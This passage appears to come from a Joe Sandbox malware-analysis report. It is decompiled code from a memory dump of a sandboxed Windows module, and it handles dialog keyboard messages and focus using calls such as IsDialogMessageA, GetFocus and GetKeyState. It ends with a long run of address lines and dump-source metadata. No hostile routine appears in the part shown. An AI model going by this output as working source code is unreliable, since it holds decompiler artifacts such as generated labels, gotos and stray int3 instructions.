                                                                                                                          					_t238 = E1002A627(_t232, _a4, _t238, _a12);
                                                                                                                          					if(_t238 == 0) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					_t142 = E1002A0D2(_t238);
                                                                                                                          					_pop(_t232);
                                                                                                                          					if(_t142 == 0) {
                                                                                                                          						L14:
                                                                                                                          						if(_t238 == 0) {
                                                                                                                          							L21:
                                                                                                                          							__eflags =  *(_t238 + 4);
                                                                                                                          							if( *(_t238 + 4) == 0) {
                                                                                                                          								E100201F1(_t232);
                                                                                                                          								asm("int3");
                                                                                                                          								_push(0x28);
                                                                                                                          								E10030D5A(E10044D1A, 0, _t238, _t247);
                                                                                                                          								_t146 = _a4;
                                                                                                                          								__eflags = _t146;
                                                                                                                          								if(_t146 != 0) {
                                                                                                                          									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                                                                                          								} else {
                                                                                                                          									_v48 = _v48 & _t146;
                                                                                                                          								}
                                                                                                                          								_t240 = _a8;
                                                                                                                          								_t249 = _t240->message;
                                                                                                                          								_v32 = _t249;
                                                                                                                          								_v52 = GetFocus();
                                                                                                                          								_t149 = E1001B042(0, _t260, _t148);
                                                                                                                          								_t229 = 0x100;
                                                                                                                          								__eflags = _t249 - 0x100;
                                                                                                                          								_v24 = _t149;
                                                                                                                          								if(_t249 < 0x100) {
                                                                                                                          									L34:
                                                                                                                          									__eflags = _t249 + 0xfffffe00 - 9;
                                                                                                                          									if(_t249 + 0xfffffe00 > 9) {
                                                                                                                          										goto L56;
                                                                                                                          									} else {
                                                                                                                          										goto L35;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = _t249 - 0x109;
                                                                                                                          									if(_t249 <= 0x109) {
                                                                                                                          										L35:
                                                                                                                          										__eflags = _t149;
                                                                                                                          										if(_t149 == 0) {
                                                                                                                          											L56:
                                                                                                                          											_t251 = 0;
                                                                                                                          											_v28 = 0;
                                                                                                                          											_t150 = E1001B042(_t229, _t260,  *_t240);
                                                                                                                          											_v44 = _v44 & 0;
                                                                                                                          											_v36 = _t150;
                                                                                                                          											_t152 = _v32 - _t229;
                                                                                                                          											__eflags = _t152;
                                                                                                                          											_v40 = 2;
                                                                                                                          											if(_t152 == 0) {
                                                                                                                          												_t153 = E1002A085(_v36, _t240);
                                                                                                                          												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                          												__eflags = _t232 - 0x1b;
                                                                                                                          												if(__eflags > 0) {
                                                                                                                          													__eflags = _t232 - 0x25;
                                                                                                                          													if(_t232 < 0x25) {
                                                                                                                          														goto L75;
                                                                                                                          													} else {
                                                                                                                          														__eflags = _t232 - 0x26;
                                                                                                                          														if(_t232 <= 0x26) {
                                                                                                                          															_v44 = 1;
                                                                                                                          															goto L110;
                                                                                                                          														} else {
                                                                                                                          															__eflags = _t232 - 0x28;
                                                                                                                          															if(_t232 <= 0x28) {
                                                                                                                          																L110:
                                                                                                                          																_t171 = E1002A085(_v24, _t240);
                                                                                                                          																__eflags = _t171 & 0x00000001;
                                                                                                                          																if((_t171 & 0x00000001) != 0) {
                                                                                                                          																	goto L75;
                                                                                                                          																} else {
                                                                                                                          																	__eflags = _v44;
                                                                                                                          																	_t232 = _a4;
                                                                                                                          																	_push(0);
                                                                                                                          																	if(_v44 == 0) {
                                                                                                                          																		_t172 = E1001E706(_t232);
                                                                                                                          																	} else {
                                                                                                                          																		_t172 = E1001E6B8(_t232);
                                                                                                                          																	}
                                                                                                                          																	_t254 = _t172;
                                                                                                                          																	__eflags = _t254;
                                                                                                                          																	if(_t254 == 0) {
                                                                                                                          																		goto L75;
                                                                                                                          																	} else {
                                                                                                                          																		__eflags =  *(_t254 + 8);
                                                                                                                          																		if( *(_t254 + 8) != 0) {
                                                                                                                          																			_t232 = _a4;
                                                                                                                          																			E1001E262(_a4, _t254);
                                                                                                                          																		}
                                                                                                                          																		__eflags =  *(_t254 + 4);
                                                                                                                          																		if( *(_t254 + 4) == 0) {
                                                                                                                          																			_t173 =  *_t254;
                                                                                                                          																			__eflags = _t173;
                                                                                                                          																			if(_t173 == 0) {
                                                                                                                          																				_t232 = _a4;
                                                                                                                          																				_t174 = E1002A143(_a4, _v24, _v44);
                                                                                                                          																			} else {
                                                                                                                          																				_t174 = E1001B042(_t229, _t260, _t173);
                                                                                                                          																			}
                                                                                                                          																			_t242 = _t174;
                                                                                                                          																			__eflags = _t242;
                                                                                                                          																			if(_t242 == 0) {
                                                                                                                          																				goto L75;
                                                                                                                          																			} else {
                                                                                                                          																				_t229 = 0;
                                                                                                                          																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                                                                                          																				E1002A17D(_t242);
                                                                                                                          																				__eflags =  *(_t254 + 8);
                                                                                                                          																				if( *(_t254 + 8) != 0) {
                                                                                                                          																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                                                                                          																				}
                                                                                                                          																				goto L125;
                                                                                                                          																			}
                                                                                                                          																		} else {
                                                                                                                          																			_t232 =  *(_t254 + 4);
                                                                                                                          																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                                                                                          																			goto L125;
                                                                                                                          																		}
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          															} else {
                                                                                                                          																__eflags = _t232 - 0x2b;
                                                                                                                          																if(_t232 != 0x2b) {
                                                                                                                          																	goto L75;
                                                                                                                          																} else {
                                                                                                                          																	goto L97;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          													goto L126;
                                                                                                                          												} else {
                                                                                                                          													if(__eflags == 0) {
                                                                                                                          														L103:
                                                                                                                          														_t243 = 0;
                                                                                                                          														__eflags = 0;
                                                                                                                          														goto L104;
                                                                                                                          													} else {
                                                                                                                          														__eflags = _t232 - 3;
                                                                                                                          														if(_t232 == 3) {
                                                                                                                          															goto L103;
                                                                                                                          														} else {
                                                                                                                          															__eflags = _t232 - 9;
                                                                                                                          															if(_t232 == 9) {
                                                                                                                          																__eflags = _t153 & 0x00000002;
                                                                                                                          																if((_t153 & 0x00000002) != 0) {
                                                                                                                          																	goto L75;
                                                                                                                          																} else {
                                                                                                                          																	_t188 = GetKeyState(0x10);
                                                                                                                          																	_t255 = _a4;
                                                                                                                          																	__eflags = _t188;
                                                                                                                          																	_t229 = 0 | _t188 < 0x00000000;
                                                                                                                          																	_t232 = _t255;
                                                                                                                          																	_t189 = E1001E11F(_t255, 0, _t188 < 0);
                                                                                                                          																	__eflags = _t189;
                                                                                                                          																	if(_t189 == 0) {
                                                                                                                          																		goto L75;
                                                                                                                          																	} else {
                                                                                                                          																		__eflags =  *(_t189 + 4);
                                                                                                                          																		if( *(_t189 + 4) == 0) {
                                                                                                                          																			_t190 =  *_t189;
                                                                                                                          																			__eflags = _t190;
                                                                                                                          																			if(_t190 == 0) {
                                                                                                                          																				_t232 = _t255;
                                                                                                                          																				_t191 = E10016D48(_t255, _v36, _t229);
                                                                                                                          																			} else {
                                                                                                                          																				_t191 = E1001B042(_t229, _t260, _t190);
                                                                                                                          																			}
                                                                                                                          																			_t244 = _t191;
                                                                                                                          																			__eflags = _t244;
                                                                                                                          																			if(_t244 != 0) {
                                                                                                                          																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                                                                                          																				E1002A17D(_t244);
                                                                                                                          																				E1002A347(_t229, _t232, _t260, _v24, _t244);
                                                                                                                          																				_pop(_t232);
                                                                                                                          																			}
                                                                                                                          																		} else {
                                                                                                                          																			_t195 =  *(_t189 + 4);
                                                                                                                          																			_t232 = _t195;
                                                                                                                          																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                                                                                          																		}
                                                                                                                          																		goto L125;
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          																goto L126;
                                                                                                                          															} else {
                                                                                                                          																__eflags = _t232 - 0xd;
                                                                                                                          																if(_t232 == 0xd) {
                                                                                                                          																	L97:
                                                                                                                          																	__eflags = _t153 & 0x00000004;
                                                                                                                          																	if((_t153 & 0x00000004) != 0) {
                                                                                                                          																		goto L75;
                                                                                                                          																	} else {
                                                                                                                          																		_t182 = E1002A122(_v24);
                                                                                                                          																		__eflags = _t182 & 0x00000010;
                                                                                                                          																		_pop(_t232);
                                                                                                                          																		if((_t182 & 0x00000010) == 0) {
                                                                                                                          																			_t183 = E1002A4C8(_a4);
                                                                                                                          																		} else {
                                                                                                                          																			_t251 = _v24;
                                                                                                                          																			_t232 = _t251;
                                                                                                                          																			_t183 = E1001DE35(_t251);
                                                                                                                          																		}
                                                                                                                          																		_t243 = 0;
                                                                                                                          																		__eflags = _t251;
                                                                                                                          																		_v40 = _t183;
                                                                                                                          																		if(_t251 != 0) {
                                                                                                                          																			L105:
                                                                                                                          																			_t232 = _t251;
                                                                                                                          																			_t184 = E1001DEAF(_t251);
                                                                                                                          																			__eflags = _t184;
                                                                                                                          																			if(_t184 != 0) {
                                                                                                                          																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                                                                                          																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                                                                                          																					goto L75;
                                                                                                                          																				} else {
                                                                                                                          																					_push(_t243);
                                                                                                                          																					_push(_t243);
                                                                                                                          																					_push(_t243);
                                                                                                                          																					_push(1);
                                                                                                                          																					_push(0xfffffdd9);
                                                                                                                          																					_push(_t251);
                                                                                                                          																					_v8 = _t243;
                                                                                                                          																					E1001DF0C();
                                                                                                                          																					_v8 = _v8 | 0xffffffff;
                                                                                                                          																					goto L125;
                                                                                                                          																				}
                                                                                                                          																			} else {
                                                                                                                          																				MessageBeep(_t243);
                                                                                                                          																				goto L75;
                                                                                                                          																			}
                                                                                                                          																		} else {
                                                                                                                          																			L104:
                                                                                                                          																			_t251 = E1002A3C2(_a4, _v40);
                                                                                                                          																			__eflags = _t251 - _t243;
                                                                                                                          																			if(_t251 == _t243) {
                                                                                                                          																				goto L75;
                                                                                                                          																			} else {
                                                                                                                          																				goto L105;
                                                                                                                          																			}
                                                                                                                          																		}
                                                                                                                          																	}
                                                                                                                          																	goto L126;
                                                                                                                          																} else {
                                                                                                                          																	goto L75;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												goto L79;
                                                                                                                          											} else {
                                                                                                                          												_t198 = _t152;
                                                                                                                          												__eflags = _t198;
                                                                                                                          												if(_t198 == 0) {
                                                                                                                          													L62:
                                                                                                                          													_t199 = E1002A085(_v36, _t240);
                                                                                                                          													__eflags = _v32 - 0x102;
                                                                                                                          													if(_v32 != 0x102) {
                                                                                                                          														L64:
                                                                                                                          														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                          														__eflags = _t232 - 9;
                                                                                                                          														if(_t232 != 9) {
                                                                                                                          															L66:
                                                                                                                          															__eflags = _t232 - 0x20;
                                                                                                                          															if(__eflags == 0) {
                                                                                                                          																goto L54;
                                                                                                                          															} else {
                                                                                                                          																_push(_t240);
                                                                                                                          																_t200 = E1002A778(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                                                                                          																__eflags = _t200;
                                                                                                                          																if(_t200 == 0) {
                                                                                                                          																	goto L75;
                                                                                                                          																} else {
                                                                                                                          																	_t201 =  *(_t200 + 4);
                                                                                                                          																	__eflags = _t201;
                                                                                                                          																	if(_t201 == 0) {
                                                                                                                          																		goto L75;
                                                                                                                          																	} else {
                                                                                                                          																		_t232 = _t201;
                                                                                                                          																		E100246E1(_t201, _t240);
                                                                                                                          																		L125:
                                                                                                                          																		_v28 = 1;
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          																goto L79;
                                                                                                                          															}
                                                                                                                          														} else {
                                                                                                                          															__eflags = _t199 & 0x00000002;
                                                                                                                          															if((_t199 & 0x00000002) != 0) {
                                                                                                                          																goto L75;
                                                                                                                          															} else {
                                                                                                                          																goto L66;
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													} else {
                                                                                                                          														__eflags = _t199 & 0x00000084;
                                                                                                                          														if((_t199 & 0x00000084) != 0) {
                                                                                                                          															goto L75;
                                                                                                                          														} else {
                                                                                                                          															goto L64;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												} else {
                                                                                                                          													__eflags = _t198 != 4;
                                                                                                                          													if(_t198 != 4) {
                                                                                                                          														L75:
                                                                                                                          														_t154 = _a4;
                                                                                                                          														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                                                                                          														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                                                                                          															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                                                                                          															__eflags = _t165;
                                                                                                                          															_v28 = _t165;
                                                                                                                          															if(_t165 != 0) {
                                                                                                                          																_t167 = E1001B042(_t229, _t260, GetFocus());
                                                                                                                          																__eflags = _t167 - _v24;
                                                                                                                          																if(_t167 != _v24) {
                                                                                                                          																	E1002A2DA(_t232, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                          																	_pop(_t232);
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          														L79:
                                                                                                                          														_t155 = IsWindow(_v52);
                                                                                                                          														__eflags = _t155;
                                                                                                                          														if(_t155 != 0) {
                                                                                                                          															E1002A347(_t229, _t232, _t260, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                          															_t161 = IsWindow(_v48);
                                                                                                                          															__eflags = _t161;
                                                                                                                          															if(_t161 != 0) {
                                                                                                                          																E1002A4F5(_a4, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          														_t156 = _v28;
                                                                                                                          													} else {
                                                                                                                          														__eflags = _v24;
                                                                                                                          														if(_v24 != 0) {
                                                                                                                          															L61:
                                                                                                                          															__eflags =  *(_t240 + 8) - 0x20;
                                                                                                                          															if( *(_t240 + 8) == 0x20) {
                                                                                                                          																goto L75;
                                                                                                                          															} else {
                                                                                                                          																goto L62;
                                                                                                                          															}
                                                                                                                          														} else {
                                                                                                                          															_t204 = GetKeyState(0x12);
                                                                                                                          															__eflags = _t204;
                                                                                                                          															if(_t204 >= 0) {
                                                                                                                          																goto L75;
                                                                                                                          															} else {
                                                                                                                          																goto L61;
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										} else {
                                                                                                                          											_t256 = _t149;
                                                                                                                          											while(1) {
                                                                                                                          												__eflags =  *(_t256 + 0x50);
                                                                                                                          												if( *(_t256 + 0x50) != 0) {
                                                                                                                          													break;
                                                                                                                          												}
                                                                                                                          												_t211 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                          												__eflags = _t211 - _a4;
                                                                                                                          												if(_t211 != _a4) {
                                                                                                                          													_t256 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                          													__eflags = _t256;
                                                                                                                          													if(_t256 != 0) {
                                                                                                                          														continue;
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          												break;
                                                                                                                          											}
                                                                                                                          											__eflags = _t256;
                                                                                                                          											if(_t256 == 0) {
                                                                                                                          												L45:
                                                                                                                          												__eflags = _v32 - 0x101;
                                                                                                                          												if(_v32 == 0x101) {
                                                                                                                          													L48:
                                                                                                                          													__eflags = _t256;
                                                                                                                          													if(_t256 == 0) {
                                                                                                                          														goto L55;
                                                                                                                          													} else {
                                                                                                                          														_t257 =  *(_t256 + 0x50);
                                                                                                                          														__eflags = _t257;
                                                                                                                          														if(_t257 == 0) {
                                                                                                                          															goto L55;
                                                                                                                          														} else {
                                                                                                                          															_t206 = _a8->wParam & 0x0000ffff;
                                                                                                                          															__eflags = _t206 - 0xd;
                                                                                                                          															if(_t206 != 0xd) {
                                                                                                                          																L52:
                                                                                                                          																__eflags = _t206 - 0x1b;
                                                                                                                          																if(_t206 != 0x1b) {
                                                                                                                          																	goto L55;
                                                                                                                          																} else {
                                                                                                                          																	__eflags =  *(_t257 + 0x84) & 0x00000002;
                                                                                                                          																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
                                                                                                                          																		goto L55;
                                                                                                                          																	} else {
                                                                                                                          																		goto L54;
                                                                                                                          																	}
                                                                                                                          																}
                                                                                                                          															} else {
                                                                                                                          																__eflags =  *(_t257 + 0x84) & 0x00000001;
                                                                                                                          																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
                                                                                                                          																	L54:
                                                                                                                          																	_t156 = 0;
                                                                                                                          																} else {
                                                                                                                          																	goto L52;
                                                                                                                          																}
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												} else {
                                                                                                                          													__eflags = _v32 - _t229;
                                                                                                                          													if(_v32 == _t229) {
                                                                                                                          														goto L48;
                                                                                                                          													} else {
                                                                                                                          														__eflags = _v32 - 0x102;
                                                                                                                          														if(_v32 != 0x102) {
                                                                                                                          															L55:
                                                                                                                          															_t240 = _a8;
                                                                                                                          															goto L56;
                                                                                                                          														} else {
                                                                                                                          															goto L48;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												_t207 =  *(_t256 + 0x50);
                                                                                                                          												__eflags = _t207;
                                                                                                                          												if(_t207 == 0) {
                                                                                                                          													goto L45;
                                                                                                                          												} else {
                                                                                                                          													__eflags =  *(_t207 + 0x58);
                                                                                                                          													if( *(_t207 + 0x58) == 0) {
                                                                                                                          														goto L45;
                                                                                                                          													} else {
                                                                                                                          														_t208 =  *(_t207 + 0x58);
                                                                                                                          														_t232 =  *_t208;
                                                                                                                          														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
                                                                                                                          														__eflags = _t209;
                                                                                                                          														if(_t209 != 0) {
                                                                                                                          															goto L45;
                                                                                                                          														} else {
                                                                                                                          															_t156 = _t209 + 1;
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										goto L34;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								return E10030DFF(_t156);
                                                                                                                          							} else {
                                                                                                                          								_t232 =  *(_t238 + 4);
                                                                                                                          								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
                                                                                                                          								__eflags = _t215 & 0x08000000;
                                                                                                                          								if((_t215 & 0x08000000) == 0) {
                                                                                                                          									goto L20;
                                                                                                                          								} else {
                                                                                                                          									goto L23;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						} else {
                                                                                                                          							_t216 =  *(_t238 + 4);
                                                                                                                          							if(_t216 == 0) {
                                                                                                                          								_t217 =  *_t238;
                                                                                                                          							} else {
                                                                                                                          								_t217 =  *(_t216 + 0x24);
                                                                                                                          							}
                                                                                                                          							if(_t217 == 0) {
                                                                                                                          								goto L21;
                                                                                                                          							} else {
                                                                                                                          								if(IsWindowEnabled(_t217) == 0) {
                                                                                                                          									L23:
                                                                                                                          									__eflags = _t238 - _v8;
                                                                                                                          									if(_t238 == _v8) {
                                                                                                                          										break;
                                                                                                                          									} else {
                                                                                                                          										__eflags = _v8;
                                                                                                                          										if(_v8 == 0) {
                                                                                                                          											_v8 = _t238;
                                                                                                                          										}
                                                                                                                          										_t247 = _t247 + 1;
                                                                                                                          										__eflags = _t247 - 0x200;
                                                                                                                          										if(_t247 < 0x200) {
                                                                                                                          											continue;
                                                                                                                          										} else {
                                                                                                                          											break;
                                                                                                                          										}
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									L20:
                                                                                                                          									_t141 = _t238;
                                                                                                                          									L28:
                                                                                                                          									return _t141;
                                                                                                                          								}
                                                                                                                          							}
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_t232 = _a4;
                                                                                                                          						_t238 = E1001E11F(_a4, _t238, 0);
                                                                                                                          						if(_t238 == 0) {
                                                                                                                          							break;
                                                                                                                          						} else {
                                                                                                                          							goto L14;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					L126:
                                                                                                                          				}
                                                                                                                          				_t141 = 0;
                                                                                                                          				__eflags = 0;
                                                                                                                          				goto L28;
                                                                                                                          			}
                                                                                                                          0x1002a7b0
                                                                                                                          0x1002a7b0
                                                                                                                          0x1002a7b8
                                                                                                                          0x1002a7ba
                                                                                                                          0x1002a7bf
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a7c9
                                                                                                                          0x1002a7d9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a7db
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a7c9
                                                                                                                          0x1002a7dd
                                                                                                                          0x1002a7dd
                                                                                                                          0x1002a7aa
                                                                                                                          0x1002a7a0
                                                                                                                          0x1002a7df
                                                                                                                          0x1002a7df
                                                                                                                          0x1002a7e1
                                                                                                                          0x1002a7ed
                                                                                                                          0x1002a7f3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a7f6
                                                                                                                          0x1002a7fd
                                                                                                                          0x1002a7fe
                                                                                                                          0x1002a810
                                                                                                                          0x1002a812
                                                                                                                          0x1002a835
                                                                                                                          0x1002a835
                                                                                                                          0x1002a838
                                                                                                                          0x1002a868
                                                                                                                          0x1002a86d
                                                                                                                          0x1002a86e
                                                                                                                          0x1002a875
                                                                                                                          0x1002a87a
                                                                                                                          0x1002a87d
                                                                                                                          0x1002a87f
                                                                                                                          0x1002a889
                                                                                                                          0x1002a881
                                                                                                                          0x1002a881
                                                                                                                          0x1002a881
                                                                                                                          0x1002a88c
                                                                                                                          0x1002a88f
                                                                                                                          0x1002a892
                                                                                                                          0x1002a89c
                                                                                                                          0x1002a89f
                                                                                                                          0x1002a8a4
                                                                                                                          0x1002a8a9
                                                                                                                          0x1002a8ab
                                                                                                                          0x1002a8ae
                                                                                                                          0x1002a8b8
                                                                                                                          0x1002a8be
                                                                                                                          0x1002a8c1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a8b0
                                                                                                                          0x1002a8b0
                                                                                                                          0x1002a8b6
                                                                                                                          0x1002a8c7
                                                                                                                          0x1002a8c7
                                                                                                                          0x1002a8c9
                                                                                                                          0x1002a976
                                                                                                                          0x1002a978
                                                                                                                          0x1002a97a
                                                                                                                          0x1002a97d
                                                                                                                          0x1002a982
                                                                                                                          0x1002a985
                                                                                                                          0x1002a98b
                                                                                                                          0x1002a98b
                                                                                                                          0x1002a98d
                                                                                                                          0x1002a994
                                                                                                                          0x1002aa1e
                                                                                                                          0x1002aa23
                                                                                                                          0x1002aa27
                                                                                                                          0x1002aa2a
                                                                                                                          0x1002ab67
                                                                                                                          0x1002ab6a
                                                                                                                          0x00000000
                                                                                                                          0x1002ab70
                                                                                                                          0x1002ab70
                                                                                                                          0x1002ab73
                                                                                                                          0x1002ac23
                                                                                                                          0x00000000
                                                                                                                          0x1002ab79
                                                                                                                          0x1002ab79
                                                                                                                          0x1002ab7c
                                                                                                                          0x1002ac2a
                                                                                                                          0x1002ac2e
                                                                                                                          0x1002ac33
                                                                                                                          0x1002ac35
                                                                                                                          0x00000000
                                                                                                                          0x1002ac3b
                                                                                                                          0x1002ac3b
                                                                                                                          0x1002ac3f
                                                                                                                          0x1002ac42
                                                                                                                          0x1002ac44
                                                                                                                          0x1002ac4d
                                                                                                                          0x1002ac46
                                                                                                                          0x1002ac46
                                                                                                                          0x1002ac46
                                                                                                                          0x1002ac52
                                                                                                                          0x1002ac54
                                                                                                                          0x1002ac56
                                                                                                                          0x00000000
                                                                                                                          0x1002ac5c
                                                                                                                          0x1002ac5c
                                                                                                                          0x1002ac60
                                                                                                                          0x1002ac62
                                                                                                                          0x1002ac66
                                                                                                                          0x1002ac66
                                                                                                                          0x1002ac6b
                                                                                                                          0x1002ac6f
                                                                                                                          0x1002ac7f
                                                                                                                          0x1002ac81
                                                                                                                          0x1002ac83
                                                                                                                          0x1002ac90
                                                                                                                          0x1002ac96
                                                                                                                          0x1002ac85
                                                                                                                          0x1002ac86
                                                                                                                          0x1002ac86
                                                                                                                          0x1002ac9b
                                                                                                                          0x1002ac9d
                                                                                                                          0x1002ac9f
                                                                                                                          0x00000000
                                                                                                                          0x1002aca5
                                                                                                                          0x1002acab
                                                                                                                          0x1002acae
                                                                                                                          0x1002acb1
                                                                                                                          0x1002acb6
                                                                                                                          0x1002acb9
                                                                                                                          0x1002acc6
                                                                                                                          0x1002acc6
                                                                                                                          0x00000000
                                                                                                                          0x1002acb9
                                                                                                                          0x1002ac71
                                                                                                                          0x1002ac71
                                                                                                                          0x1002ac77
                                                                                                                          0x00000000
                                                                                                                          0x1002ac77
                                                                                                                          0x1002ac6f
                                                                                                                          0x1002ac56
                                                                                                                          0x1002ab82
                                                                                                                          0x1002ab82
                                                                                                                          0x1002ab85
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002ab85
                                                                                                                          0x1002ab7c
                                                                                                                          0x1002ab73
                                                                                                                          0x00000000
                                                                                                                          0x1002aa30
                                                                                                                          0x1002aa30
                                                                                                                          0x1002abbf
                                                                                                                          0x1002abbf
                                                                                                                          0x1002abbf
                                                                                                                          0x00000000
                                                                                                                          0x1002aa36
                                                                                                                          0x1002aa36
                                                                                                                          0x1002aa39
                                                                                                                          0x00000000
                                                                                                                          0x1002aa3f
                                                                                                                          0x1002aa3f
                                                                                                                          0x1002aa42
                                                                                                                          0x1002aae1
                                                                                                                          0x1002aae3
                                                                                                                          0x00000000
                                                                                                                          0x1002aae9
                                                                                                                          0x1002aaeb
                                                                                                                          0x1002aaf1
                                                                                                                          0x1002aaf6
                                                                                                                          0x1002aaf9
                                                                                                                          0x1002aafc
                                                                                                                          0x1002ab01
                                                                                                                          0x1002ab06
                                                                                                                          0x1002ab08
                                                                                                                          0x00000000
                                                                                                                          0x1002ab0e
                                                                                                                          0x1002ab0e
                                                                                                                          0x1002ab12
                                                                                                                          0x1002ab27
                                                                                                                          0x1002ab29
                                                                                                                          0x1002ab2b
                                                                                                                          0x1002ab39
                                                                                                                          0x1002ab3b
                                                                                                                          0x1002ab2d
                                                                                                                          0x1002ab2e
                                                                                                                          0x1002ab2e
                                                                                                                          0x1002ab40
                                                                                                                          0x1002ab42
                                                                                                                          0x1002ab44
                                                                                                                          0x1002ab4d
                                                                                                                          0x1002ab52
                                                                                                                          0x1002ab5b
                                                                                                                          0x1002ab61
                                                                                                                          0x1002ab61
                                                                                                                          0x1002ab14
                                                                                                                          0x1002ab14
                                                                                                                          0x1002ab1a
                                                                                                                          0x1002ab1c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a8b6
                                                                                                                          0x1002aade
                                                                                                                          0x1002a83a
                                                                                                                          0x1002a83a
                                                                                                                          0x1002a83f
                                                                                                                          0x1002a842
                                                                                                                          0x1002a847
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a847
                                                                                                                          0x1002a814
                                                                                                                          0x1002a814
                                                                                                                          0x1002a819
                                                                                                                          0x1002a820
                                                                                                                          0x1002a81b
                                                                                                                          0x1002a81b
                                                                                                                          0x1002a81b
                                                                                                                          0x1002a824
                                                                                                                          0x00000000
                                                                                                                          0x1002a826
                                                                                                                          0x1002a82f
                                                                                                                          0x1002a849
                                                                                                                          0x1002a849
                                                                                                                          0x1002a84c
                                                                                                                          0x00000000
                                                                                                                          0x1002a84e
                                                                                                                          0x1002a84e
                                                                                                                          0x1002a851
                                                                                                                          0x1002a853
                                                                                                                          0x1002a853
                                                                                                                          0x1002a856
                                                                                                                          0x1002a857
                                                                                                                          0x1002a85d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a85d
                                                                                                                          0x1002a831
                                                                                                                          0x1002a831
                                                                                                                          0x1002a831
                                                                                                                          0x1002a861
                                                                                                                          0x1002a865
                                                                                                                          0x1002a865
                                                                                                                          0x1002a82f
                                                                                                                          0x1002a824
                                                                                                                          0x1002a800
                                                                                                                          0x1002a800
                                                                                                                          0x1002a80a
                                                                                                                          0x1002a80e
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x1002a80e
                                                                                                                          0x00000000
                                                                                                                          0x1002a7fe
                                                                                                                          0x1002a85f
                                                                                                                          0x1002a85f
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
